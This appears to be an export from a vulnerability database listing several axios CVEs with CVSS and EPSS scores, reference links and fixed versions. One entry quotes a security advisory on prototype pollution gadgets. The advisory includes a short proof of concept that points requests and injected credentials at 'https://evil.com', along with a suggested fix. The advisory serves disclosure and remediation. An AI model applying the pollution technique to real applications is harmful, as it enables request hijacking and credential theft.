resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hadc-5d2f-gqe6

url VCID-jvs6-8bva-nqb3

vulnerability_id VCID-jvs6-8bva-nqb3

summary axios: Axios: Denial of Service via unbounded stream consumption when 'responseType: 'stream'' is used

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42036

reference_id

reference_type

scores

value	0.00031
scoring_system	epss
scoring_elements	0.09373
published_at	2026-06-05T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.09393
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42036

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:30:17Z/

url

https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42036

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42036

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461633
reference_id	2461633
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461633

reference_url

https://github.com/advisories/GHSA-vf2m-468p-8v99

reference_id

GHSA-vf2m-468p-8v99

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-vf2m-468p-8v99

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42036, GHSA-vf2m-468p-8v99

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jvs6-8bva-nqb3

url VCID-kwj2-mk8c-4fef

vulnerability_id VCID-kwj2-mk8c-4fef

summary axios: Axios: Remote Code Execution via Prototype Pollution escalation

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json

reference_id

reference_type

scores

value	9.0
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-40175

reference_id

reference_type

scores

value	0.00063
scoring_system	epss
scoring_elements	0.19878
published_at	2026-06-06T12:55:00Z

value	0.00063
scoring_system	epss
scoring_elements	0.19885
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-40175

reference_url

https://cert-portal.siemens.com/productcert/html/ssa-876049.html

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://cert-portal.siemens.com/productcert/html/ssa-876049.html

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/

url

https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c

reference_url

https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/

url

https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1

reference_url

https://github.com/axios/axios/pull/10660

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/

url

https://github.com/axios/axios/pull/10660

reference_url

https://github.com/axios/axios/pull/10660#issuecomment-4224168081

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios/pull/10660#issuecomment-4224168081

reference_url

https://github.com/axios/axios/pull/10688

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/

url

https://github.com/axios/axios/pull/10688

reference_url

https://github.com/axios/axios/releases/tag/v0.31.0

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/

url

https://github.com/axios/axios/releases/tag/v0.31.0

reference_url

https://github.com/axios/axios/releases/tag/v1.15.0

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/

url

https://github.com/axios/axios/releases/tag/v1.15.0

reference_url

https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/

url

https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-40175

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-40175

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2457432
reference_id	2457432
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2457432

reference_url	https://access.redhat.com/errata/RHSA-2026:10104
reference_id	RHSA-2026:10104
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:10104

reference_url	https://access.redhat.com/errata/RHSA-2026:10153
reference_id	RHSA-2026:10153
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:10153

reference_url	https://access.redhat.com/errata/RHSA-2026:10172
reference_id	RHSA-2026:10172
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:10172

reference_url	https://access.redhat.com/errata/RHSA-2026:10175
reference_id	RHSA-2026:10175
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:10175

reference_url	https://access.redhat.com/errata/RHSA-2026:11414
reference_id	RHSA-2026:11414
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:11414

reference_url	https://access.redhat.com/errata/RHSA-2026:13542
reference_id	RHSA-2026:13542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13542

reference_url	https://access.redhat.com/errata/RHSA-2026:13548
reference_id	RHSA-2026:13548
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13548

reference_url	https://access.redhat.com/errata/RHSA-2026:13571
reference_id	RHSA-2026:13571
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13571

reference_url	https://access.redhat.com/errata/RHSA-2026:13826
reference_id	RHSA-2026:13826
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13826

reference_url	https://access.redhat.com/errata/RHSA-2026:14774
reference_id	RHSA-2026:14774
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14774

reference_url	https://access.redhat.com/errata/RHSA-2026:14937
reference_id	RHSA-2026:14937
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14937

reference_url	https://access.redhat.com/errata/RHSA-2026:15091
reference_id	RHSA-2026:15091
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:15091

reference_url	https://access.redhat.com/errata/RHSA-2026:16874
reference_id	RHSA-2026:16874
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16874

reference_url	https://access.redhat.com/errata/RHSA-2026:17468
reference_id	RHSA-2026:17468
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17468

reference_url	https://access.redhat.com/errata/RHSA-2026:17474
reference_id	RHSA-2026:17474
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17474

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19712
reference_id	RHSA-2026:19712
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19712

reference_url	https://access.redhat.com/errata/RHSA-2026:20041
reference_id	RHSA-2026:20041
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20041

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:8483
reference_id	RHSA-2026:8483
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8483

reference_url	https://access.redhat.com/errata/RHSA-2026:8484
reference_id	RHSA-2026:8484
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8484

reference_url	https://access.redhat.com/errata/RHSA-2026:8490
reference_id	RHSA-2026:8490
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8490

reference_url	https://access.redhat.com/errata/RHSA-2026:8491
reference_id	RHSA-2026:8491
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8491

reference_url	https://access.redhat.com/errata/RHSA-2026:8493
reference_id	RHSA-2026:8493
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8493

reference_url	https://access.redhat.com/errata/RHSA-2026:8499
reference_id	RHSA-2026:8499
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8499

reference_url	https://access.redhat.com/errata/RHSA-2026:8500
reference_id	RHSA-2026:8500
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8500

reference_url	https://access.redhat.com/errata/RHSA-2026:8501
reference_id	RHSA-2026:8501
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8501

reference_url	https://access.redhat.com/errata/RHSA-2026:9742
reference_id	RHSA-2026:9742
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:9742

fixed_packages

url pkg:npm/axios@1.15.0

purl pkg:npm/axios@1.15.0

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4b7a-22xk-gbh9

vulnerability	VCID-5kg1-k416-dfc1

vulnerability	VCID-6ru1-uamj-5ud3

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-gp41-4j8d-37ce

vulnerability	VCID-hadc-5d2f-gqe6

vulnerability	VCID-jvs6-8bva-nqb3

vulnerability	VCID-rusx-pwdw-zqcj

vulnerability	VCID-vzqt-dj1z-bqa6

vulnerability	VCID-xdas-dhtb-nuge

vulnerability	VCID-xg1x-4spz-jucn

vulnerability	VCID-yu5y-e4bk-zyfp

vulnerability	VCID-z5pf-pqcd-ckas

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0

aliases CVE-2026-40175, GHSA-fvcv-3m26-pcqx

risk_score 4.0

exploitability 0.5

weighted_severity 8.1

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kwj2-mk8c-4fef

url VCID-rusx-pwdw-zqcj

vulnerability_id VCID-rusx-pwdw-zqcj

summary

Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking
## Summary

Five config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.

## Affected Properties

1. **`config.auth`** (`lib/adapters/http.js` line 617)  Injects attacker-controlled `Authorization` header on all requests.
2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18) Redirects all requests using relative URLs to an attacker-controlled server.
3. **`config.socketPath`** (`lib/adapters/http.js` line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).
4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698) Executes attacker-supplied callback during HTTP redirects.
5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712) Enables Node.js insecure HTTP parser on all requests.

## Proof of Concept

```javascript
const axios = require('axios');

// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';

await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentials
```

## Impact

- **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers.
- **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server.
- **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.
- **Code execution:** Attacker-supplied functions execute during HTTP redirects.
- **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling.

## Root Cause

`mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values.

The `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection.

## Suggested Fix

Apply the existing `own()` helper to all affected properties:

```javascript
const configAuth = own('auth');
if (configAuth) {
  const username = configAuth.username || '';
  const password = configAuth.password || '';
  auth = username + ':' + password;
}
```

Same pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`.

references

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42264

reference_id

reference_type

scores

value	0.0009
scoring_system	epss
scoring_elements	0.255
published_at	2026-06-06T12:55:00Z

value	0.0009
scoring_system	epss
scoring_elements	0.25514
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42264

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42264
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42264

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	8.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/

url

https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa

reference_url

https://github.com/axios/axios/pull/10779

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/

url

https://github.com/axios/axios/pull/10779

reference_url

https://github.com/axios/axios/releases/tag/v1.15.2

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/

url

https://github.com/axios/axios/releases/tag/v1.15.2

reference_url

https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/

url

https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42264

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42264

reference_url

https://github.com/advisories/GHSA-q8qp-cvcw-x6jj

reference_id

GHSA-q8qp-cvcw-x6jj

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-q8qp-cvcw-x6jj

fixed_packages

url pkg:npm/axios@1.15.2

purl pkg:npm/axios@1.15.2

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-dqkm-8xjg-63hn

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.2

aliases CVE-2026-42264, GHSA-q8qp-cvcw-x6jj

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rusx-pwdw-zqcj

url VCID-td7u-cct6-bud6

vulnerability_id VCID-td7u-cct6-bud6

summary axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json

reference_id

reference_type

scores

value	7.0
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-62718

reference_id

reference_type

scores

value	0.00069
scoring_system	epss
scoring_elements	0.21334
published_at	2026-06-06T12:55:00Z

value	0.00069
scoring_system	epss
scoring_elements	0.21348
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-62718

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718

reference_url

https://datatracker.ietf.org/doc/html/rfc1034#section-3.1

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://datatracker.ietf.org/doc/html/rfc1034#section-3.1

reference_url

https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c

reference_url

https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df

reference_url

https://github.com/axios/axios/pull/10661

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://github.com/axios/axios/pull/10661

reference_url

https://github.com/axios/axios/pull/10688

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://github.com/axios/axios/pull/10688

reference_url

https://github.com/axios/axios/releases/tag/v0.31.0

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://github.com/axios/axios/releases/tag/v0.31.0

reference_url

https://github.com/axios/axios/releases/tag/v1.15.0

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://github.com/axios/axios/releases/tag/v1.15.0

reference_url

https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
